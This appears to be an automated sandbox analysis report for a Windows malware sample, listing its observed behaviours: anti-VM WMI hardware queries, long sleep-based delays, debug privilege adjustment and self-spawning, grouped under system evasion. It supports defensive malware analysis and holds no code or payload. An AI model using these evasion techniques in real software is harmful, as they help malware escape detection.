                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002A_127.exe PID: 5396, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeMemory allocated: 1720000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeMemory allocated: 2F50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeMemory allocated: 2E80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeMemory allocated: 7D00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeMemory allocated: 8D00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeMemory allocated: 8FB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeMemory allocated: 9FB0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeMemory allocated: 1760000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeMemory allocated: 30E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeMemory allocated: 2F50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 599891Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 599778Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 599672Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 599563Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 599438Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 599328Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 599219Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 599094Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 598984Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 598875Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 598766Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 598656Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 598547Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 598423Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 598297Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 598188Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 598063Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 597953Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 597844Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 597722Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 597594Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 597485Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 597374Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 597266Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 597141Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 597016Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 596906Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 596797Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 596688Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 596563Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 596438Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 596328Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 596219Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 596094Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 595985Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 595860Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 595735Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 595610Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 595485Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 595360Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 595235Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 595110Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 594985Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 594860Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 594735Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 594595Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 594469Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 594359Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 594250Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWindow / User API: threadDelayed 8291Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWindow / User API: threadDelayed 1539Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 5880Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -599891s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -599778s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -599672s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -599563s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -599438s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -599328s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -599219s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -599094s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -598984s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -598875s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -598766s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -598656s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -598547s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -598423s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -598297s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -598188s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -598063s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -597953s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -597844s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -597722s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -597594s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -597485s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -597374s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -597266s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -597141s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -597016s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -596906s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -596797s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -596688s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -596563s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -596438s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -596328s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -596219s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -596094s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -595985s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -595860s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -595735s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -595610s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -595485s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -595360s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -595235s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -595110s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -594985s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -594860s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -594735s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -594595s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -594469s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -594359s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe TID: 3784Thread sleep time: -594250s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 599891Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 599778Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 599672Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 599563Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 599438Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 599328Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 599219Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 599094Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 598984Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 598875Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 598766Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 598656Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 598547Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 598423Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 598297Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 598188Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 598063Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 597953Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 597844Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 597722Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 597594Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 597485Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 597374Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 597266Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 597141Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 597016Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 596906Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 596797Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 596688Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 596563Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 596438Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 596328Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 596219Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 596094Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 595985Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 595860Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 595735Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 595610Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 595485Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 595360Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 595235Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 595110Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 594985Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 594860Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 594735Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 594595Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 594469Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 594359Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeThread delayed: delay time: 594250Jump to behavior
                      Source: LisectAVT_2403002A_127.exeBinary or memory string: qEMut
                      Source: LisectAVT_2403002A_127.exe, 00000003.00000002.4573204072.0000000001342000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeProcess created: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe "C:\Users\user\Desktop\LisectAVT_2403002A_127.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeQueries volume information: C:\Users\user\Desktop\LisectAVT_2403002A_127.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\LisectAVT_2403002A_127.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
